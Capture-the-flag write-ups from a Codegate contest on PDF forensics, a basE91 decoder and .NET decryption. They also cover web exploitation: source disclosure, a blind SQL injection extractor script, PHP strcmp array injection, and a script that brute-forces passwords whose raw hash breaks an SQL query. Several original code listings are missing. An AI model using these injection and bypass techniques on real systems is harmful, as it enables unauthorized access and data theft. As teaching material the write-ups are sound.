This was the 4th challenge under the misc category which was worth 300 points. A zipped file was provided for this challenge with the following hints:
The zipped file contained a single binary file with no extension. TrID was used to identify the extracted file from its binary signature and reported an Adobe PDF file, so the file was renamed with a .pdf extension and opened in Adobe Reader.
Only two words (! Confidential Documents !) were displayed when the PDF was opened in Adobe Reader. The real content had to be dug out of the raw PDF source, which carries the complete description of the fixed-layout document: the text, fonts, graphics and every other object needed to render it, including objects the viewer never draws.
The 1st key was found very easily within object 12. 1st_key(nn@LiC!oU$)
Hints for the 2nd key were discovered within object 5.
Hint #1 mentioned that the 2nd key is made up of strings contained in three objects; hint #2 stated that its length is 14. Scanning through the raw PDF source, objects 6, 7 and 8 looked likely to contain text strings, so the line used for object 5 was amended to replace the digit 5 with 6, 7 and 8 in turn to display the contents of each object.
Object 6 :: PpPDdD[
Object 7 :: F_F
Object 8 :: ]ile
Concatenating the three strings gave the 2nd key: PpPDdD[F_F]ile (strlen = 14)
The 3rd key needed a careful look at the data stream within object 11. Its 1101 bytes of stream data were extracted and saved to a new binary file, then uncompressed with PHP's gzuncompress() (which inflates zlib-format data, the encoding behind a PDF /FlateDecode stream). The result turned out to be another PDF file.
PHP Script:
PDF Specification:
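The extraction step above, as an added example (my Python, not the PHP script from the original writeup): a small object and stream extractor that locates a numbered object in a PDF, slices its stream using the /Length entry (falling back to the endstream keyword when the length is an indirect reference), and inflates /FlateDecode data with zlib.decompress(), the equivalent of PHP's gzuncompress(). The SAMPLE_PDF bytes are constructed here so the script runs offline; the object numbers and strings in it are placeholders, not the challenge file.

```python
import re
import zlib

OBJ_HDR_RE = re.compile(rb"(?<![0-9])(\d+) (\d+) obj\b")
STREAM_START_RE = re.compile(rb"stream\r?\n")
# A direct /Length entry; an indirect one (`/Length 5 0 R`) is deliberately skipped.
DIRECT_LEN_RE = re.compile(rb"/Length\s+(\d+)(?![0-9])(?!\s+\d+\s+R)")


def list_objects(pdf: bytes) -> list:
    """Object numbers in file order (an object redefined by an update appears twice)."""
    return [int(m.group(1)) for m in OBJ_HDR_RE.finditer(pdf)]


def extract_stream(pdf: bytes, objnum: int, gen: int = 0) -> bytes:
    """Return the decoded stream data of object `objnum gen`.

    The data is sliced by the direct /Length when there is one, otherwise up to
    the `endstream` keyword; /FlateDecode streams are inflated.
    """
    hdr = re.search(rb"(?<![0-9])%d %d obj\b" % (objnum, gen), pdf)
    if hdr is None:
        raise KeyError(f"object {objnum} {gen} not found")
    end_obj = pdf.find(b"endobj", hdr.end())
    sm = STREAM_START_RE.search(pdf, hdr.end())
    if sm is None or (end_obj != -1 and sm.start() > end_obj):
        raise ValueError(f"object {objnum} has no stream")
    dictionary = pdf[hdr.end():sm.start()]
    lm = DIRECT_LEN_RE.search(dictionary)
    if lm:
        raw = pdf[sm.end():sm.end() + int(lm.group(1))]
    else:
        raw = pdf[sm.end():pdf.index(b"endstream", sm.end())].rstrip(b"\r\n")
    if b"/FlateDecode" not in dictionary:
        return raw
    # zlib.decompress() does what PHP's gzuncompress() did in the writeup: both
    # inflate zlib-wrapped (RFC 1950) data, which is what a /FlateDecode stream holds.
    try:
        return zlib.decompress(raw)
    except zlib.error:
        # Truncated or padded stream: keep whatever inflates cleanly.
        return zlib.decompressobj().decompress(raw)


def nested_objects(pdf: bytes, objnum: int) -> list:
    """Inflate a stream and, if the payload is itself a PDF, list the objects in it."""
    inner = extract_stream(pdf, objnum)
    return list_objects(inner) if inner.startswith(b"%PDF") else []


# Constructed sample (placeholder strings, not the challenge file): object 12 holds
# a plain string, object 11 a FlateDecode stream whose payload is itself a PDF, the
# same nesting the writeup found in object 11.
INNER_PDF = b"%PDF-1.4\n7 0 obj\n<< /Note (nested document placeholder) >>\nendobj\n%%EOF\n"
_deflated = zlib.compress(INNER_PDF)
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"12 0 obj\n<< /Key (first key placeholder) >>\nendobj\n"
    b"11 0 obj\n<< /Length " + str(len(_deflated)).encode()
    + b" /Filter /FlateDecode >>\nstream\n" + _deflated + b"\nendstream\nendobj\n"
    + b"%%EOF\n"
)

if __name__ == "__main__":
    print("objects:", list_objects(SAMPLE_PDF))
    inner = extract_stream(SAMPLE_PDF, 11)
    print("object 11 inflates to %d bytes starting %r" % (len(inner), inner[:8]))
    print("objects inside the nested PDF:", nested_objects(SAMPLE_PDF, 11))
```

Slicing by /Length rather than searching for `endstream` matters on real files: compressed data is binary and can legitimately contain the bytes of a keyword, and a truncated stream (the decompressobj fallback) is common in CTF files that were hand-edited.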
The next lead came from the Javascript contained within object 7 of this extracted PDF. Some modifications were made to the script in order to view the alert, which read "Decrypt_ME". The cipher was then changed to "673B672B3E663C666F2B37390D362061", a string contained within the extracted PDF source, and the 3rd key was revealed: 3rd_key=4n4ly5i5
HTML with Javascript:
Captured the flag with the 3 keys combined! 300 points in the bag!! Yay!!!
Flag: nn@LiC!oU$_PpPDdD[F_F]ile_4n4ly5i5
Cheers,
Braeburn Ladny
The 3rd challenge under the Misc category, with a reward of 200 points, got underway with a binary that was identified as a “Wireshark PCAP Next Generation Dump File Format (Little Endian)” file by TrID.
2 hints were given for this challenge:
- [Misc3(200) Hint] You can solve the question off-line.
- [Misc3(200) Hint] Find out document.
The objective was to find the document in question among the 7161 captured network packets. Thankfully, listing the HTTP objects (File > Export Objects > HTTP) and saving them to a local directory was a breeze with Wireshark, and a total of 59 files were exported for analysis.
Sample list of files exported:
When the selected file above was viewed in Adobe Reader it showed the official rules for the Codegate YUT Challenge. On closer examination in Notepad, however, the raw PDF source revealed that the file carried several incremental updates, evidenced by several "%%EOF" markers and re-defined objects after the first one. A PDF viewer renders only the newest revision, but every earlier revision stays in the file, so the key was revealed once the last update was deleted from the PDF source. Flag captured! 200 points in the bag!! Yay!!!
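The incremental-update trick above, as an added example (my Python, not code from the writeup): viewers render the newest revision, but every earlier revision, each ending in its own %%EOF, is still in the file. The functions below slice a PDF into revisions, show which objects each update redefines, and return the document as it stood before the last update. SAMPLE_PDF is constructed here with placeholder text (xref tables omitted for brevity); it is not the challenge file.

```python
import re

EOF_RE = re.compile(rb"%%EOF\r?\n?")
OBJ_HDR_RE = re.compile(rb"(?<![0-9])(\d+) (\d+) obj\b")


def revision_ends(pdf: bytes) -> list:
    """Byte offset just past each %%EOF: one entry per time the file was saved."""
    return [m.end() for m in EOF_RE.finditer(pdf)]


def revision(pdf: bytes, n: int) -> bytes:
    """The file as it stood after revision n (0 = first save, -1 = what a viewer shows)."""
    return pdf[: revision_ends(pdf)[n]]


def objects_in_revision(pdf: bytes, n: int) -> list:
    """Object numbers (re)defined by revision n, i.e. what that update overwrote."""
    ends = revision_ends(pdf)
    n = range(len(ends))[n]           # normalise a negative index
    start = ends[n - 1] if n else 0
    return [int(m.group(1)) for m in OBJ_HDR_RE.finditer(pdf, start, ends[n])]


def latest_object_body(pdf: bytes, objnum: int) -> bytes:
    """The body of object `objnum` that a viewer uses: the last definition in the file."""
    defs = list(re.finditer(rb"(?<![0-9])%d 0 obj\b(.*?)endobj" % objnum, pdf, re.S))
    if not defs:
        raise KeyError(objnum)
    return defs[-1].group(1).strip()


def strip_last_update(pdf: bytes) -> bytes:
    """Drop the newest incremental update so the previous revision becomes current."""
    ends = revision_ends(pdf)
    if len(ends) < 2:
        raise ValueError("single revision; nothing to strip")
    return pdf[: ends[-2]]


# Constructed sample (placeholder text, not the challenge file). A real update also
# appends an xref section and a trailer whose /Prev points at the previous one;
# both are omitted here for brevity.
ORIGINAL = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"3 0 obj\n<< /Note (text from the first save) >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Size 4 >>\nstartxref\n0\n%%EOF\n"
)
UPDATE = (
    b"3 0 obj\n<< /Note (replacement text a viewer displays) >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Size 4 /Prev 0 >>\nstartxref\n0\n%%EOF\n"
)
SAMPLE_PDF = ORIGINAL + UPDATE

if __name__ == "__main__":
    for i in range(len(revision_ends(SAMPLE_PDF))):
        print(f"revision {i} defines objects {objects_in_revision(SAMPLE_PDF, i)}")
    print("viewer shows:", latest_object_body(SAMPLE_PDF, 3))
    print("before last update:", latest_object_body(strip_last_update(SAMPLE_PDF), 3))
```

Comparing `objects_in_revision` across revisions is the quick triage step: an update that redefines only a page content or string object, while leaving the catalog alone, is the classic "edited to hide something" pattern.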
Cheers,
Braeburn Ladny
This was the second challenge under the misc category, worth 200 points. Two files were provided, an encoded key and a PHP source file. The challenge was to write a decoder function to decode the encoded key.
Contents of source.php:
Several points were gathered from the encoder function:
- $enc_tab, an array of 91 items: the output alphabet.
- $var1 contained the (shifted) ASCII value of the input character being processed, i.e. an accumulator of pending input bits.
- $var2 contained the number of bits still to be processed from $var1.
- $var3 contained the working value of $var1.
- Once $var2 exceeded 13, the low 13 bits of $var1 were examined: if their value was between 89 and 8191, $var1 was shifted right by 13 places; otherwise the low 14 bits were taken as the value and $var1 was shifted right by 14 places. Two characters were then picked from $enc_tab, indexed by the remainder and the quotient of dividing that value by 91 (the size of $enc_tab).
With these points in mind, the decoder function was written to be:
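The original decoder is not reproduced on this page. The encoder described above (a 91-symbol table, 13 bits consumed when the low 13 bits exceed 88, otherwise 14, and two output symbols taken from the remainder and quotient by 91) matches the published basE91 algorithm. As an added example, here is my Python implementation of both directions; the decoder reverses each step of the encoder. It assumes the standard basE91 alphabet; if the challenge's $enc_tab was in a different order, pass that 91-character string as `alphabet`.

```python
# Standard basE91 alphabet (Joachim Henke's reference order).
# ASSUMPTION: the challenge's $enc_tab may have been ordered differently; pass your
# own 91-character table to the functions below if so.
BASE91_ALPHABET = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "!#$%&()*+,./:;<=>?@[]^_`{|}~\""
)


def b91encode(data: bytes, alphabet: str = BASE91_ALPHABET) -> str:
    """Encode bytes to basE91 text (the scheme the challenge's encoder implements)."""
    acc, nbits, out = 0, 0, []
    for byte in data:
        acc |= byte << nbits            # accumulator of pending bits, LSB first
        nbits += 8
        if nbits > 13:
            v = acc & 8191              # look at the low 13 bits ...
            if v > 88:
                acc >>= 13
                nbits -= 13
            else:                       # ... small value: take 14 bits instead
                v = acc & 16383
                acc >>= 14
                nbits -= 14
            out.append(alphabet[v % 91])    # remainder first ...
            out.append(alphabet[v // 91])   # ... then quotient
    if nbits:                           # flush whatever is left
        out.append(alphabet[acc % 91])
        if nbits > 7 or acc > 90:
            out.append(alphabet[acc // 91])
    return "".join(out)


def b91decode(text: str, alphabet: str = BASE91_ALPHABET) -> bytes:
    """Decode basE91 text back to bytes, undoing each encoder step."""
    dectab = {c: i for i, c in enumerate(alphabet)}
    v, acc, nbits, out = -1, 0, 0, bytearray()
    for c in text:
        if c not in dectab:
            continue                    # whitespace or foreign characters are skipped
        if v < 0:
            v = dectab[c]               # first symbol of a pair: the remainder
            continue
        v += dectab[c] * 91             # second symbol: the quotient
        acc |= v << nbits
        # The encoder consumed 13 bits when the low 13 bits exceeded 88, else 14.
        nbits += 13 if (v & 8191) > 88 else 14
        while nbits > 7:
            out.append(acc & 255)
            acc >>= 8
            nbits -= 8
        v = -1
    if v >= 0:                          # a lone trailing symbol carries the last bits
        out.append((acc | v << nbits) & 255)
    return bytes(out)


if __name__ == "__main__":
    sample = b"test"                    # constructed input, not the challenge key
    encoded = b91encode(sample)
    print(encoded, b91decode(encoded))
```

Decoding a challenge key with a custom table is then `b91decode(encoded_key, "".join(enc_tab))`, with `enc_tab` copied from the PHP source in the same order.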
Flag captured! 200 points in the bag!! Yay!!!
Cheers,
Braeburn Ladny
This was the fifth challenge under the web category which was worth 500 points. The challenge kicked off with a note that read “connect with mobile”. Connecting to the website with a stock desktop browser showed the following “mobile only” text.
In came the User Agent Switcher browser extension: switching the user agent to "iPhone 4" got past this restriction (a User-Agent check is entirely client-controlled and never a security boundary) and gained access to the site. Oh yea!
The site was actually a game simulator where you could create your own character by giving it a name. Each character started off with 150 points to be assigned to its 3 attributes (strength, dexterity and intelligence) depending on your preference. I named my character “wolf”.
Examination of the source code revealed two Javascript files, one of which (main.js) contained obfuscated code.
Contents of main.js:
The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)
Line 18 of the above code revealed how the URLs for each of the 3 pages (home.html, introduce.html, get_tag.html) were formed: index.php took the page name as a parameter. Feeding index.php PHP file names instead of the expected pages worked wonders: the server returned the PHP source instead of executing it. Repeating this for simulator.php and simulator_ok.php gathered several valuable hints for this challenge.
Contents of simulator.php:
- Line 15: if ($_POST['name'] == "GM") die("you can not view&save with 'GM'");
There was a restriction on using "GM" as the character name. GM probably stands for Game Master.
- Line 17: $db = sqlite_open("/var/game_db/gamesim_".$_SESSION['scrap'].".db");
The path to the character database file, one file per $_SESSION['scrap'] value!
- Line 94: memo : <input type='text' name='memo' value='<?php if (isset($row[0])) echo gzuncompress($row['memo.memo']); ?>' maxlength=32 />
Data in the memo.memo column is stored compressed and must be passed through gzuncompress() (zlib inflate) to read it.
Following that naming pattern, /var/game_db/gamesim_GM.db (the database for the forbidden GM name) was requested, and the response was identified as an SQLite 2.1 database.
With the SQLite database file extracted from the response, the next step was to write a script to read its contents. Recall from the third point above that memo.memo must be uncompressed to recover the original data. Note that the SQLite 2.1 format is the one PHP's legacy sqlite extension (sqlite_open(), as used by simulator.php) understands; current sqlite3 tools cannot open it.
Script to read database contents:
Key found! 500 points in the bag. Yay!
Cheers,
Braeburn Ladny
This was the third challenge under the web category which was worth 300 points. The challenge began with a letter addressed to Sherlock Holmes.
The objective of this challenge was to play the role of Sherlock Holmes and figure out who asked the hacker group to hack "Hound Co.,Ltd." and when.
Examination of the site revealed there was a suspicious Javascript file secret.js which was the first lead gathered for this challenge. However the code was clearly obfuscated as shown below.
Contents of secret.js:
The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)
Line 8 of this Javascript exposed the hidden PHP file, d56b699830e77ba53855679cb1d252da.php, which popped up after the "Grey" logo was clicked 10 times. This was in fact the login form, so the challenge became finding login credentials to reach the restricted area.
Candy: md5(login) = d56b699830e77ba53855679cb1d252da
Examination of the site showed no obvious sign of an SQL injection flaw. Do you know of any tools that can help look for such flaws?
There are several tools that automate the detection and exploitation of SQL injection flaws; sqlmap, an open source penetration testing tool, is the one most widely used for this purpose.
Command used to identify a time-based blind SQLi in the "question" parameter:
Subsequently commands were issued to identify the databases, tables and table entries:
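The sqlmap commands themselves are not reproduced on this page. As an added example of what the tool automates (my Python against a back end I construct here, not the challenge's), the script below keeps the vulnerable pattern, a request parameter pasted straight into the query, turns the page's true/false answer into an oracle, and recovers a column value one character at a time by binary search over `unicode(substr(...))`, which is how the database, table and row enumeration works. Time-based blind injection, the technique sqlmap used here, is the same inference loop with a measurable delay (for example MySQL's SLEEP()) as the yes/no signal instead of page content; SQLite has no sleep function, so the boolean variant is shown. Table and member names are placeholders.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (placeholder data only)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE faq (question TEXT, answer TEXT);
        INSERT INTO faq VALUES ('Who hired the hackers?', 'no comment');
        CREATE TABLE members (name TEXT, password TEXT);
        INSERT INTO members VALUES ('victor', 'placeholder_md5_here');
    """)
    return db


def vulnerable_lookup(db: sqlite3.Connection, question: str) -> bool:
    """The flaw sqlmap found: the 'question' parameter is concatenated into SQL.

    The page only reveals whether some row matched (true/false), nothing else.
    """
    sql = f"SELECT COUNT(*) FROM faq WHERE question = '{question}'"
    return db.execute(sql).fetchone()[0] > 0


def make_oracle(db: sqlite3.Connection):
    """Wrap the true/false page in a yes/no oracle for an arbitrary SQL condition."""
    def oracle(condition: str) -> bool:
        # Close the string, OR in our condition, comment out the trailing quote.
        return vulnerable_lookup(db, f"' OR ({condition}) --")
    return oracle


def extract_string(oracle, subquery: str, maxlen: int = 128) -> str:
    """Recover the (ASCII) result of a scalar subquery one character at a time.

    Each position is found by binary search on its code point, 7 oracle queries
    per character instead of up to 127; code point 0 (coalesce of the NULL that
    unicode('') yields) marks the end of the string.
    """
    result = ""
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"coalesce(unicode(substr(({subquery}), {pos}, 1)), 0) > {mid}"
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def enumerate_tables(oracle) -> list:
    """What `sqlmap --tables` does, through the same oracle."""
    names = extract_string(
        oracle, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    return names.split(",")


def dump_password(oracle, user: str) -> str:
    """What `sqlmap --dump` does for one row of the credentials table."""
    return extract_string(oracle, f"SELECT password FROM members WHERE name='{user}'")


if __name__ == "__main__":
    oracle = make_oracle(build_db())
    print("tables:", enumerate_tables(oracle))
    print("victor's password hash:", dump_password(oracle, "victor"))
```

The fix on the server side is the usual one: a parameterised query (`db.execute("... WHERE question = ?", (question,))`) leaves the attacker no way to close the string literal, and the oracle disappears with it.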
The recovered password hashes were looked up in an online MD5 lookup service (MD5 is not encryption; such services simply match unsalted hashes against precomputed tables):
Logged in with the credentials for victor and solved the mystery! 300 points in the bag. Yay!
Cheers,
Braeburn Ladny
This was the second challenge under the web category which was worth 200 points. It began with a short note from the organizer that read – “One Time Password..?” and a hyperlink to a Ca$h website where Captain Teemo was on duty.
The Ca$h website included the option to generate a One Time Password (OTP) that was needed during login. Option to download the (zipped) source code for the website was also available.
Contents of the zipped file:
- index.html – Website index page
- jquery-1.8.3.js – JQuery file
- main.js – JQuery file
- images – Folder containing css and image files
- home.php – Homepage containing some description for the website
- login.php – Login page
- login_ok.php – Check the login credentials submitted
- otp.php – Display the OTP and its validity period
- otp_util.php – OTP generation page
Contents of “login_ok.php”:
Contents of “otp.php”:
Contents of “otp_util.php”:
From login_ok.php, the flag is returned when the submitted password matches the value produced by make_otp() and the submitted ID is "127.0.0.1". A closer look at make_otp() shows the OTP is the sha1 hash of a string formed by concatenating $time (the current Unix time integer-divided by 20), $user ("127.0.0.1") and $seed (the md5 hash of the flag file contents concatenated with the md5 hash of the User-Agent header).
One Time Password (Valid for 20 secs)
There are 2 obstacles to overcome. Let's examine them in detail:
- $_SERVER["REMOTE_ADDR"] – The IP address from which you are viewing the current page.
Are you able to spoof this to be “127.0.0.1″?
- $_SERVER['HTTP_USER_AGENT'] – Contents of the User-Agent: header from the current request, if there is one. This is a string identifying the user agent that is accessing the page.
Are you able to match whatever string value used by the organizer?
Take a moment to think about overcoming these 2 obstacles and whether there is an alternative approach to this challenge.
- $_SERVER["REMOTE_ADDR"] – Even if you spoof the source address of your packets to "127.0.0.1", you will never receive the response: the server's replies are routed to that address, i.e. to itself, so the TCP handshake never completes and the application code is never reached.
- $_SERVER['HTTP_USER_AGENT'] – It’s anybody’s guess what string was used by the organizer. It may be empty or random.
The 2 obstacles certainly look difficult to overcome. Another approach lies in line 10 of login_ok.php, where $_POST["ps"] is compared against $password with a string-comparison function such as strcmp(). Given an array instead of a string, that comparison does not compare anything: it emits a warning and returns NULL, and PHP's loose comparison treats NULL == 0 as true, which is the "match" result (PHP 8 throws a TypeError here instead). This attack is known as array injection.
Array Injection PHP Script:
When the script (login_ok.php) received this POST request, the string comparison failed with a warning, returned NULL and was treated as a match, so the code inside the if statement ran and echoed the contents of the flag file! 200 points in the bag. Yay!
Flag Captured:
Cheers,
Braeburn Ladny
This was the first challenge under the web category which was worth 100 points. It began with a short note from the organizer that read – “Let’s swimming!” and a hyperlink to a member login page which included the option to download the (zipped) source code for the website.
Contents of the zipped file:
- login.php_files – Folder containing css and image files
- db_schema.sql – Database schema file
- login.php.htm – Member login page
- login_check.php – PHP page to check the ID & password entered against the database entry
Contents of "db_schema.sql":
Contents of “login_check.php”:
In order to capture the flag for this challenge, you will need to gain access as “admin” so that the contents of “flag.txt” will be read and displayed.
The ID ($id) and password ($ps) values submitted to the form are passed through mysql_real_escape_string() to escape special characters, after which a whirlpool hash of the password value is computed.
It is important to note that when the 3rd parameter of hash() is TRUE, the function returns raw binary data rather than the lowercase hex digits it returns when the parameter is FALSE, and that raw output is then placed in the query without any escaping. So there is no point brute-forcing the stored password value of 'f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f': it is fruitless.
The objective is to carefully craft a password value that will create a hash value that can nullify the user_ps parameter and gain admin access! How can you achieve that objective? Take some time to think about this before reading on.
Well, to achieve that you need to exploit type conversion during SQL expression evaluation, in particular MySQL's conversion of strings to numbers. You need a $ps whose raw hash has the form string1'='string2, so that the SQL statement becomes (select * from users where user_id='$id' and user_ps='string1'='string2').
MySQL evaluates the chained comparison left to right, as (user_ps='string1')='string2'. The inner comparison yields 0 (false), since string1 is just digest bytes that match nothing. Comparing that 0 with 'string2' converts the string to a number; a string that does not begin with a digit converts to 0, so 0=0 evaluates to TRUE, the WHERE clause holds for the admin row, and all data associated with "admin" is returned. Two more conditions must hold for the digest: it may contain no other quote or backslash (the output is not escaped, so either would break the statement), and string2 must not begin with a digit. The next step is to create a script to compute passwords whose hash satisfies this format.
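The password-generation script is not reproduced on this page. As an added example (my Python, not the writeup's script), here is the search it describes. login_check.php hashed the password with whirlpool in raw-binary mode; Python's hashlib only exposes whirlpool when the underlying OpenSSL build provides it, so the script falls back to md5 when it does not (the search logic is identical, only the digest length and hit rate differ, and the digest length reported by ALGO tells you which one ran). The candidate check encodes the MySQL rules worked out above, including the two extra conditions a usable digest must satisfy: no other quote, backslash or NUL anywhere in it, and nothing numeric-looking at the start of string2. It searches numeric passwords, as the writeup's result (4075629) suggests; any password alphabet works.

```python
import hashlib

# login_check.php used hash('whirlpool', $ps, true); use it when OpenSSL offers it.
ALGO = "whirlpool" if "whirlpool" in hashlib.algorithms_available else "md5"


def raw_hash(password: str, algo: str = ALGO) -> bytes:
    """Equivalent of PHP hash($algo, $password, true): raw digest bytes, not hex."""
    return hashlib.new(algo, password.encode()).digest()


def splits_query(digest: bytes) -> bool:
    """Does this raw digest, dropped unescaped into  user_ps='<digest>' , turn the
    predicate into (user_ps='A')='B' with 'B' converting to 0 in MySQL?"""
    i = digest.find(b"'='")
    if i < 0:
        return False
    a, b = digest[:i], digest[i + 3:]
    # Any other quote or backslash breaks the statement (nothing is escaped), and a
    # NUL is avoided too since the C client API may truncate the query at it.
    if set(b"'\\\x00") & set(a + b):
        return False
    # MySQL converts 'B' to a number for the 0='B' comparison: a leading digit,
    # sign or dot (after optional whitespace) would give a non-zero value.
    head = b.lstrip(b" \t\r\n")[:1]
    return head == b"" or head not in b"0123456789+-."


def injected_query(user_id: str, digest: bytes) -> bytes:
    """The statement login_check.php ends up sending for a given raw digest."""
    return (b"select * from users where user_id='" + user_id.encode()
            + b"' and user_ps='" + digest + b"'")


def find_candidate(max_tries: int = 2_000_000, algo: str = ALGO):
    """Brute-force numeric passwords until the raw digest has the A'='B shape.

    Returns the password string, or None if none appeared within max_tries.
    """
    for n in range(max_tries):
        pw = str(n)
        if splits_query(raw_hash(pw, algo)):
            return pw
    return None


if __name__ == "__main__":
    print("digest algorithm:", ALGO)
    pw = find_candidate()
    if pw is None:
        print("no candidate in range; raise max_tries")
    else:
        print("password:", pw)
        print("query seen by MySQL:", injected_query("admin", raw_hash(pw)))
```

The hit rate is roughly (digest length - 2) / 2^24 per candidate, so a 64-byte whirlpool digest needs a few hundred thousand tries on average and a 16-byte md5 digest a few million; the md5 fallback is there so the logic can be exercised anywhere, not because md5 would have worked against this challenge.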
Passwords Generation Script:
Passwords Generated:
Using admin and 4075629 as the login credentials will grant you access as admin and have the flag revealed! 100 points in the bag. Yay!
Flag Captured:
Cheers,
Braeburn Ladny
The 1st challenge under the binary category, worth 100 points, kicked off with a binary executable given to participants. PEiD identified the binary as a "Microsoft Visual C# / Basic .NET" file. Running it showed a simulation program for a door lock.
As no hint was given for the challenge, the next step was to put the binary through .NET Reflector to decompile and analyse the code. Of the 13 objects listed in the object browser, 12 were system-related; all focus went to the only remaining object, "Crack_Test".
Although Crack_Test contained several methods, there was one particular method that stood out from the rest – void TransFormable(string).
As observed in lines 5 & 7 of the decompiled method, if the two strings matched, a message box was shown with a decrypted string, which might well be the flag for this challenge. Gathering the data (key, IV and ciphertext) and the decryption code used within TransFormable() became the next step towards the goal.
With the above information gathered, a simple PHP script was written to perform the decryption with the Rijndael cipher (the algorithm behind .NET's RijndaelManaged; with a 128-bit block size it is AES).
And the flag was captured! 100 points in the bag!! Yay!
Cheers,
Braeburn Ladny